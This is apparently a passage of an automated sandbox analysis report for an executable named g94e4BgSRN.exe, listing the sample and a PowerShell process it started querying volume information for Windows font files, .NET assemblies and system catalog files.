                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\g94e4BgSRN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
